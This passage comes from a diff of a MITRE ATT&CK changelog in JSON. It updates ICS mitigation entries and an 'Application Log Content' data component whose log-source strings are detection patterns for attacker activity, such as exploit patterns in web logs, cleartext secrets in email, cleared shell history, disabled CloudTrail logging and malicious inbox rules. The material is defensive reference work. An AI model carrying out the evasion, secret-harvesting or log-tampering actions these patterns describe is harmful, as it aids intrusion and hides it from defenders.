+                    "description": "Network allowlists can be implemented through either host-based files or system hosts files to specify what connections (e.g., IP address, MAC address, port, protocol) can be made from a device. Allowlist techniques that operate at the  application layer (e.g., DNP3, Modbus, HTTP) are addressed in [Filter Network Traffic](https://attack.mitre.org/mitigations/M0937) mitigation.",
+                    "revoked": false,
+                    "labels": [
+                        "NIST SP 800-53 Rev. 5 - AC-3"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/mitigations/M0807",
+                            "external_id": "M0807"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.731000+00:00\", \"old_value\": \"2026-04-23 00:56:32.131000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "course-of-action",
+                    "id": "course-of-action--3172222b-4983-43f7-8983-753ded4f13bc",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-06-10 20:46:02.263000+00:00",
+                    "modified": "2026-05-12 15:12:00.730000+00:00",
+                    "name": "Network Intrusion Prevention",
+                    "description": "Use intrusion detection signatures to block traffic at network boundaries.  In industrial control environments, network intrusion prevention should be configured so it will not disrupt protocols and communications responsible for real-time functions related to control or safety.",
+                    "revoked": false,
+                    "labels": [
+                        "IEC 62443-3-3:2013 - SR 6.2",
+                        "IEC 62443-4-2:2019 - CR 6.2",
+                        "NIST SP 800-53 Rev. 5 - SI-4"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/mitigations/M0931",
+                            "external_id": "M0931"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.730000+00:00\", \"old_value\": \"2026-04-23 00:47:04.457000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "course-of-action",
+                    "id": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-06-10 20:41:03.271000+00:00",
+                    "modified": "2026-05-12 15:12:00.730000+00:00",
+                    "name": "Network Segmentation",
+                    "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network.  Restrict network access to only required systems and services. In addition, prevent systems from other networks or business functions (e.g., enterprise) from accessing critical process control systems. For example, in IEC 62443, systems within the same secure level should be grouped into a zone, and access to that zone is restricted by a conduit, or mechanism to restrict data flows between zones by segmenting the network. (Citation: IEC February 2019) (Citation: IEC August 2013)",
+                    "revoked": false,
+                    "labels": [
+                        "IEC 62443-3-3:2013 - SR 5.1",
+                        "IEC 62443-4-2:2019 - CR 5.1",
+                        "NIST SP 800-53 Rev. 5 - AC-3"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/mitigations/M0930",
+                            "external_id": "M0930"
+                        },
+                        {
+                            "source_name": "IEC August 2013",
+                            "description": "IEC 2013, August Industrial communication networks - Network and system security - Part 3-3: System security requirements and security levels Retrieved. 2020/09/25 ",
+                            "url": "https://webstore.iec.ch/publication/7033"
+                        },
+                        {
+                            "source_name": "IEC February 2019",
+                            "description": "IEC 2019, February Security for industrial automation and control systems - Part 4-2: Technical security requirements for IACS components Retrieved. 2020/09/25 ",
+                            "url": "https://webstore.iec.ch/publication/34421"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.730000+00:00\", \"old_value\": \"2026-04-23 00:46:09.190000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "course-of-action",
+                    "id": "course-of-action--b11cad63-ef30-4eb8-af0d-6cc46eef3f3e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-06-06 21:16:18.709000+00:00",
+                    "modified": "2026-05-12 15:12:00.731000+00:00",
+                    "name": "Out-of-Band Communications Channel",
+                    "description": "Have alternative methods to support communication requirements during communication failures and data integrity attacks. (Citation: National Institute of Standards and Technology April 2013) (Citation: Defense Advanced Research Projects Agency)",
+                    "revoked": false,
+                    "labels": [
+                        "NIST SP 800-53 Rev. 5 - SC-37"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/mitigations/M0810",
+                            "external_id": "M0810"
+                        },
+                        {
+                            "source_name": "Defense Advanced Research Projects Agency",
+                            "description": "Defense Advanced Research Projects Agency National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17  Rapid Attack Detection, Isolation and Characterization Systems (RADICS) Retrieved. 2020/09/17 ",
+                            "url": "https://www.darpa.mil/program/rapid-attack-detection-isolation-and-characterization-systems"
+                        },
+                        {
+                            "source_name": "National Institute of Standards and Technology April 2013",
+                            "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17 ",
+                            "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.731000+00:00\", \"old_value\": \"2026-04-23 00:56:53.267000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "course-of-action",
+                    "id": "course-of-action--5d97c693-e054-48ba-a3a3-eaf6942dfb65",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-06-06 21:10:35.792000+00:00",
+                    "modified": "2026-05-12 15:12:00.730000+00:00",
+                    "name": "Password Policies",
+                    "description": "Set and enforce secure password policies for accounts.",
+                    "revoked": false,
+                    "labels": [
+                        "IEC 62443-3-3:2013 - SR 1.5",
+                        "IEC 62443-4-2:2019 - CR 1.5",
+                        "NIST SP 800-53 Rev. 5 - IA-5"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/mitigations/M0927",
+                            "external_id": "M0927"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.730000+00:00\", \"old_value\": \"2025-04-16 21:26:28.470000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "course-of-action",
+                    "id": "course-of-action--f9fcb3ec-6de0-4559-8cd9-ef1c0c7d1971",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-06-06 20:54:49.964000+00:00",
+                    "modified": "2026-05-12 15:12:00.731000+00:00",
+                    "name": "Restrict File and Directory Permissions",
+                    "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                    "revoked": false,
+                    "labels": [
+                        "IEC 62443-3-3:2013 - SR 2.1",
+                        "IEC 62443-4-2:2019 - CR 2.1",
+                        "NIST SP 800-53 Rev. 5 - AC-6"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/mitigations/M0922",
+                            "external_id": "M0922"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.731000+00:00\", \"old_value\": \"2026-04-23 00:57:09.061000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "course-of-action",
+                    "id": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-06-06 21:16:18.709000+00:00",
+                    "modified": "2026-05-12 15:12:00.731000+00:00",
+                    "name": "Software Process and Device Authentication",
+                    "description": "Require the authentication of devices and software processes where appropriate. Devices that connect remotely to other systems should require strong authentication to prevent spoofing of communications. Furthermore, software processes should also require authentication when accessing APIs.",
+                    "revoked": false,
+                    "labels": [
+                        "IEC 62443-3-3:2013 - SR 1.2",
+                        "IEC 62443-4-2:2019 - CR 1.2",
+                        "NIST SP 800-53 Rev. 5 - IA-3"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/mitigations/M0813",
+                            "external_id": "M0813"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.731000+00:00\", \"old_value\": \"2026-04-23 00:55:20.765000+00:00\"}}}",
+                    "previous_version": "1.2"
+                },
+                {
+                    "type": "course-of-action",
+                    "id": "course-of-action--52c7a1a9-3a78-4528-a44f-cd7b0fa3541a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-06-06 21:16:18.709000+00:00",
+                    "modified": "2026-05-12 15:12:00.730000+00:00",
+                    "name": "Static Network Configuration",
+                    "description": "Configure hosts and devices to use static network configurations when possible, protocols that require dynamic discovery/addressing (e.g., ARP, DHCP, DNS) can be used to manipulate network message forwarding and enable various AiTM attacks. This mitigation may not always be usable due to limited device features or challenges introduced with different network configurations.",
+                    "revoked": false,
+                    "labels": [
+                        "IEC 62443-3-3:2013 - SR 7.7",
+                        "IEC 62443-4-2:2019 - CR 7.7",
+                        "NIST SP 800-53 Rev. 5 - CM-7"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/mitigations/M0814",
+                            "external_id": "M0814"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.730000+00:00\", \"old_value\": \"2026-04-23 00:50:32.432000+00:00\"}}}",
+                    "previous_version": "1.2"
+                }
+            ],
+            "revocations": [],
+            "deprecations": [],
+            "deletions": []
+        },
+        "datasources": {
+            "additions": [],
+            "major_version_changes": [],
+            "minor_version_changes": [],
+            "other_version_changes": [],
+            "patches": [],
+            "revocations": [],
+            "deprecations": [],
+            "deletions": []
+        },
+        "datacomponents": {
+            "additions": [],
+            "major_version_changes": [],
+            "minor_version_changes": [],
+            "other_version_changes": [],
+            "patches": [
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.272000+00:00",
+                    "modified": "2026-05-12 15:12:00.776000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0038",
+                            "external_id": "DC0038"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Application Log Content",
+                    "description": "Application Log Content refers to logs generated by applications or services, providing a record of their activity. These logs may include metrics, errors, performance data, and operational alerts from web, mail, or other applications. These logs are vital for monitoring application behavior and detecting malicious activities or anomalies. Examples: \n\n- Web Application Logs: These logs include information about requests, responses, errors, and security events (e.g., unauthorized access attempts).\n- Email Application Logs: Logs contain metadata about emails sent, received, or blocked (e.g., sender/receiver addresses, message IDs).\n- SaaS Application Logs: Activity logs include user logins, configuration changes, and access to sensitive resources.\n- Cloud Application Logs: Logs detail control plane activities, including API calls, instance modifications, and network changes.\n- System/Application Monitoring Logs: Logs provide insights into application performance, errors, and anomalies.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "android:logcat",
+                            "channel": "Default IME active or bound to <pkg> (InputMethodManager reports imeId=<pkg>)"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Default IME changed/active: imeId=<pkg>, onStartInput/onFinishInput high frequency. TYPE_APPLICATION_OVERLAY|addView .* showing on top of package <otherPkg>"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Default IME active imeId=<pkg>; frequent onStartInput/commitText calls"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "addView TYPE_APPLICATION_OVERLAY|TYPE_APPLICATION_ATTACHED_DIALOG shown over <target_pkg>"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Secure/Global reads of device_policy_manager, accessibility_enabled, default_vpn, always_on_vpn"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Task switch from browser/custom tab to handler immediately after OAuth return"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "ACTION_OPEN_DOCUMENT_TREE / ACTION_OPEN_DOCUMENT invoked without user gesture or repeatedly in background"
+                        },
+                        {
+                            "name": "Application Log",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "Application:Mail",
+                            "channel": "smtpd$.*$: .*from=[.*@internaldomain.com](mailto:.*@internaldomain.com) to=[.*@internaldomain.com](mailto:.*@internaldomain.com)"
+                        },
+                        {
+                            "name": "Application:Mail",
+                            "channel": "Inbound messages with anomalous headers, spoofed SPF/DKIM failures"
+                        },
+                        {
+                            "name": "Application:Mail",
+                            "channel": "Inbound emails containing hyperlinks from suspicious sources"
+                        },
+                        {
+                            "name": "Application:Mail",
+                            "channel": "Inbound email attachments logged from MTAs with suspicious metadata"
+                        },
+                        {
+                            "name": "Application:Mail",
+                            "channel": "Mismatch between authenticated username and From header in email"
+                        },
+                        {
+                            "name": "Application:Mail",
+                            "channel": "High-frequency inbound mail activity to a specific recipient address"
+                        },
+                        {
+                            "name": "ApplicationLog:API",
+                            "channel": "Docker/Kubernetes API access from external sources"
+                        },
+                        {
+                            "name": "ApplicationLog:CallRecords",
+                            "channel": "Outbound or inbound calls to high-risk or blocklisted numbers"
+                        },
+                        {
+                            "name": "ApplicationLog:EntraIDPortal",
+                            "channel": "DeviceRegistration events"
+                        },
+                        {
+                            "name": "ApplicationLog:IIS",
+                            "channel": "IIS W3C logs in C:\\inetpub\\logs\\LogFiles\\W3SVC* (spikes in 5xx, RCE/SQLi/path traversal/JNDI patterns)"
+                        },
+                        {
+                            "name": "ApplicationLog:Ingress",
+                            "channel": "Kubernetes NGINX/Envoy ingress controller logs with anomalous payloads and 5xx spikes"
+                        },
+                        {
+                            "name": "ApplicationLog:Intune/MDM Logs",
+                            "channel": "Enrollment events (e.g., MDMDeviceRegistration)"
+                        },
+                        {
+                            "name": "ApplicationLog:MailServer",
+                            "channel": "Unexpected additions of sieve rules or filtering directives"
+                        },
+                        {
+                            "name": "ApplicationLog:Outlook",
+                            "channel": "Outlook client-level rule creation actions not consistent with normal user activity"
+                        },
+                        {
+                            "name": "ApplicationLog:WebServer",
+                            "channel": "/var/log/httpd/access_log, /var/log/apache2/access.log, /var/log/nginx/access.log with exploit indicators and burst errors"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "SendEmail"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "InvokeModel"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "InvokeFunction: Unexpected or repeated invocation of functions not tied to known workflows"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "CreateUser|AttachRolePolicy|CreateAccessKey|UpdateAssumeRolePolicy|CreateLoginProfile"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "StopLogging, DeleteTrail, UpdateTrail: API calls that disable or modify logging services"
+                        },
+                        {
+                            "name": "AWS:CloudWatch",
+                            "channel": "Repeated crash pattern within container or instance logs"
+                        },
+                        {
+                            "name": "AWS:CloudWatch",
+                            "channel": "Elevated 5xx response rates in application logs or gateway layer"
+                        },
+                        {
+                            "name": "azure:activity",
+                            "channel": "Add role assignment / ElevateAccess / Create service principal"
+                        },
+                        {
+                            "name": "azure:audit",
+                            "channel": "App registrations or consent grants by abnormal users or at unusual times"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "ConsentGrant: Suspicious consent grants to non-approved or unknown applications"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Modify Conditional Access Policy"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Register PTA Agent or Modify AD FS trust"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Resource access initiated using application credentials, not user accounts"
+                        },
+                        {
+                            "name": "docker:daemon",
+                            "channel": "container_create,container_start"
+                        },
+                        {
+                            "name": "docker:events",
+                            "channel": "Container exited with non-zero code repeatedly in short period"
+                        },
+                        {
+                            "name": "docker:runtime",
+                            "channel": "execution of cloud CLI tool (e.g., aws, az) inside container"
+                        },
+                        {
+                            "name": "EDR:detection",
+                            "channel": "ThreatDetected, QuarantineLog"
+                        },
+                        {
+                            "name": "EDR:detection",
+                            "channel": "ThreatLog"
+                        },
+                        {
+                            "name": "esxi:esxupdate",
+                            "channel": "/var/log/esxupdate.log contains VIB installed with `--force` or `--no-sig-check` and non-standard acceptance levels"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "/var/log/hostd.log anomalies (faults, crashes, restarts) around inbound connections"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "Keywords: 'Backtrace','Signal 11','PANIC','hostd restarted','assert' or 'Service terminated unexpectedly' in /var/log/hostd.log, /var/log/vmkernel.log, /var/log/syslog.log."
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "unexpected script/command invocations via hostd"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "Guest Operations API invocation: StartProgramInGuest, ListProcessesInGuest, ListFileInGuest, InitiateFileTransferFromGuest"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "unexpected script invocations producing long encoded strings"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "Host daemon command log entries related to vib enumeration"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "New extension/module install with unknown vendor ID"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "vmkernel / OpenSLP logs for malformed requests"
+                        },
+                        {
+                            "name": "esxi:vpxd",
+                            "channel": "Symmetric crypto routines triggered for external session"
+                        },
+                        {
+                            "name": "esxi:vpxd",
+                            "channel": "ESXi process initiating asymmetric handshake with external host"
+                        },
+                        {
+                            "name": "gcp:workspaceaudit",
+                            "channel": "SendAs: Outbound messages with alias identities that differ from primary account"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Repeated or large UIPasteboard reads; background pasteboard access shortly before packaging"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "UIPasteboard read (general/string/data) by <bundle_id>; repeated reads or background access"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "UIWindow/UIView events indicating secure text entry focus, editingChanged bursts, unexpected firstResponder cycling"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Secure text entry focus and editingChanged bursts not typical for the app"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Presentation of credential-like view (UIAlertController with text fields / custom modal) not backed by system auth controller; frequent editingChanged in secureTextEntry fields"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Repeated canOpenURL checks across diverse schemes (\u2265N within short window)"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "UIDocumentPickerViewController presented repeatedly without foreground interaction or with short dwell time"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "repeated sandbox denials related to restricted process/system interfaces consistent with process-table querying attempts"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "security-relevant kernel log messages indicating restricted system interface access attempts by app process (device-dependent visibility)"
+                        },
+                        {
+                            "name": "journald:Application",
+                            "channel": "Segfault or crash log entry associated with specific application binary"
+                        },
+                        {
+                            "name": "journald:systemd",
+                            "channel": "Repeated service restart attempts or unit failures"
+                        },
+                        {
+                            "name": "kubernetes:orchestrator",
+                            "channel": "Access to orchestrator logs containing credentials (Docker/Kubernetes logs)"
+                        },
+                        {
+                            "name": "linux:cli",
+                            "channel": "cleared or truncated .bash_history"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "usb * new|thunderbolt|pci .* added|block.*: new .* device"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Inbound messages from webmail services containing attachments or URLs"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "kernel|systemd messages indicating 'segmentation fault'|'core dumped'|'service terminated unexpectedly' for sshd, smbd, vsftpd, mysqld, httpd, etc."
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "System daemons initiating encrypted sessions with unexpected destinations"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "milter configuration updated, transport rule initialized, unexpected script execution"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Repetitive HTTP 408, 500, or 503 errors logged within short timeframe"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Application or browser logs (webview errors, plugin enumerations) indicating suspicious script evaluation or plugin loads"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "processes binding to non-standard ports or sshd configured on unexpected port"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "system daemons initiating TLS sessions outside expected services"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "browser/office crash, segfault, abnormal termination"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Error/warning logs from services indicating load spike or worker exhaustion"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "SPF fail OR DKIM fail OR DMARC fail OR mismatched from_domain vs return_path_domain"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "suspicious DHCP lease assignment with unexpected DNS or gateway"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "opened document|clicked link|segfault|abnormal termination|sandbox"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Authentication attempts into finance-related servers from unusual IPs or times"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "sshd sessions with unusual port forwarding parameters"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Non-standard processes negotiating SSL/TLS key exchanges"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Module registration or stacktrace logs indicating segmentation faults or unknown module errors"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Segfaults, kernel oops, or crashes in security software processes"
+                        },
+                        {
+                            "name": "m365:exchange",
+                            "channel": "Emails containing cleartext secrets (password=, api_key=, token=) shared across internal/external domains"
+                        },
+                        {
+                            "name": "m365:exchange",
+                            "channel": "Transport Rule Modification"
+                        },
+                        {
+                            "name": "m365:exchange",
+                            "channel": "Admin Audit Logs, Transport Rules"
+                        },
+                        {
+                            "name": "m365:exchange",
+                            "channel": "MailDelivery: High-frequency delivery of messages or attachments to a single recipient"
+                        },
+                        {
+                            "name": "m365:exchange",
+                            "channel": "New-InboxRule: Automation that triggers abnormal forwarding or external link generation"
+                        },
+                        {
+                            "name": "m365:exchange",
+                            "channel": "MessageTrace logs"
+                        },
+                        {
+                            "name": "m365:exchange",
+                            "channel": "External sender message followed by user action involving links or attachments"
+                        },
+                        {
+                            "name": "m365:mailboxaudit",
+                            "channel": "Outlook rule creation or custom form deployment"
+                        },
+                        {
+                            "name": "m365:messagetrace",
+                            "channel": "AuthenticationDetails=fail OR SPF=fail OR DKIM=fail OR DMARC=fail"
+                        },
+                        {
+                            "name": "m365:messagetrace",
+                            "channel": "X-MS-Exchange-Organization-AutoForwarded"
+                        },
+                        {
+                            "name": "m365:purview",
+                            "channel": "MailItemsAccessed & Exchange Audit"
+                        },
+                        {
+                            "name": "m365:purview",
+                            "channel": "MailItemsAccessed, Search-Mailbox events"
+                        },
+                        {
+                            "name": "m365:teams",
+                            "channel": "External chat request or new tenant communication preceding approval activity"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Unusual form activity within Outlook client, including load of non-default forms"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "SendOnBehalf, MessageSend, ClickThrough, MailItemsAccessed"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "SendOnBehalf, MessageSend, AttachmentPreviewed"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Send/Receive: Emails with suspicious sender domains, spoofed headers, or anomalous attachment types"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "FileAccessed: Access of email attachments by Office applications"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Creation or modification of inbox rule outside of normal user behavior"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Send/Receive: Inbound emails containing embedded or shortened URLs"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "AppRegistration: Unexpected application registration or OAuth authorization"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "MessageSend, MessageRead, or FileAttached events containing credential-like patterns"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Set-Mailbox, Add-InboxRule, RegisterWebhook"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "ConsentGranted: Abuse of application integrations to mint tokens bypassing MFA"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Application Consent grants, new OAuth client registrations, or unusual admin-level activities executed by a user account shortly after suspected drive-by compromise"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Folder configuration updated with external or HTML-formatted Home Page via Set-MailboxFolder"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "PurgeAuditLogs, Remove-MailboxAuditLog"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Set-CsOnlineUser or UpdateAuthPolicy"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "New-InboxRule or Set-InboxRule events recorded in Exchange Online"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Transport rule or inbox rule creation events"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "GAL Lookup or Address Book download"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Send/Receive: Inbound emails with attachments from suspicious or spoofed senders"
